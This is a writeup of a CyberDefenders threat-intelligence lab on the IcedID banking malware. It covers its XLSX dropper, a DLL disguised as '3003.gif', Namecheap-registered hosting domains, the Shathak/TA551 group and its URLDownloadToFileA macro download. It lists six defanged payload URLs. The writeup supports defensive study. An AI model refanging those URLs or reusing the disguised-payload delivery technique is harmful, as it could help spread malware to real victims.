IcedID — Threat Intel Lab Writeup

Image Source

Overview

This writeup documents my approach to the lab IcedID available on the CyberDefenders website, a blue team-focused cyber threat intelligence lab that requires you to examine a potential attack.

Disclaimer

I like to add a brief disclaimer before a writeup to encourage people to attempt the lab before reading this article, since there will obviously be spoilers in this writeup. I believe you will enjoy the lab more if you attempt it yourself first and then come back to this writeup if you get stuck or need a hint. So without any further delay, lets get started!

Scenario

A cyber threat group was identified for initiating widespread phishing campaigns to distribute further malicious payloads. The most frequently encountered payloads were IcedID. You have been given a hash of an IcedID sample to analyze and monitor the activities of this advanced persistent threat (APT) group.

Lab Analysis

What is the name of the file associated with the given hash?

Uploading the provided hash to VirusTotal, it appears this hash is related to a malicious XLSX file. The popular threat label for this file is trojan.x97m/icedid. According to MITRE, IcedID is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. IcedID has been downloaded by Emotet in multiple campaigns. In VirusTotal, we can see the associated file names for this hash.

Associated File Names.

Can you identify the filename of the GIF file that was deployed?

In VirusTotal, we can see multiple files are dropped by the malware, including a GIF file seen below.

3003.gif

Pivoting on this file in VirusTotal, we can observe that the file is actually a windows DLL file. In a threat report from TrendMicro, it mentions that the threat actors use XLSM files containing malicious macro code to download a 64-bit .dll file, which is the IcedID in binary. The article provides sample URL’s seen below, where the IcedID malware is disguised as a GIF file.

hxxps://agenbolatermurah[.]com/ds/3003[.]gif
hxxps://agenbolatermurah[.]com/ds/3003[.]gif
hxxps://columbia[.]aula-web[.]net/ds/3003[.]gif
hxxps://metaflip[.]io/ds/3003[.]gif
hxxps://partsapp[.]com[.]br/ds/3003[.]gif
hxxps://tajushariya[.]com/ds/3003[.]gif

How many domains does the malware look to download the additional payload file in Q2?

In VirusTotal, we can see the malware contacts some of the domains observed above to download the additional payload file titled “3003.gif” in Q2.

Malware Contacted URL’s.

From the domains mentioned in Q3, a DNS registrar was predominantly used by the threat actor to host their harmful content, enabling the malware’s functionality. Can you specify the Registrar INC?

In VirusTotal, we can see under the relations tab that some of the domains which hosted the additional payload have the DNS registrar “NAMECHEAP INC”.

DNS Registrar.

Threat actors can use Namecheap to register their domains due to low-cost domain registration, ease of registration, lenient abuse policies and fast domain propagation, to name but a few reasons.

Could you specify the threat actor linked to the sample provided?

MITRE provides a list of groups that use this software. One such group is G0127 (i.e. GOLD CABIN or Shathak). A case study published by BitDefender states that this is a financially motivated threat group operating since 2018. They usually distribute malware by using malicious documents in password-protected archives and involve a domain generation algorithm to thwart law enforcement agencies to block registered domains.

TA551’s URLs usually host a PHP script that delivers the malware as a DLL. Prior to April 2020, the most common malware associated with Shathak was Ursnif. After that, they started infecting victims with Valak. By taking into account that both Ursnif and Valak are considered to have ties with the Russian-speaking community, we can infer that Shathak is likely made up of Russian cybercriminals. Since the end of July 2020, their favorite tool in the arsenal became IcedID.

In the Execution phase, what function does the malware employ to fetch extra payloads onto the system?

In an article posted by Fortinet, we can see that the Excel file contains obfuscated Excel 4.0 macro formulas to download and execute either payload. The macro generates a payload URL and calls the WinAPI function “URLDownloadToFileA” to download the malware.

Conclusion

I really enjoyed working through this lab and learning more about the IcedID malware. Thank you for reading till the end and I hope you enjoyed this writeup!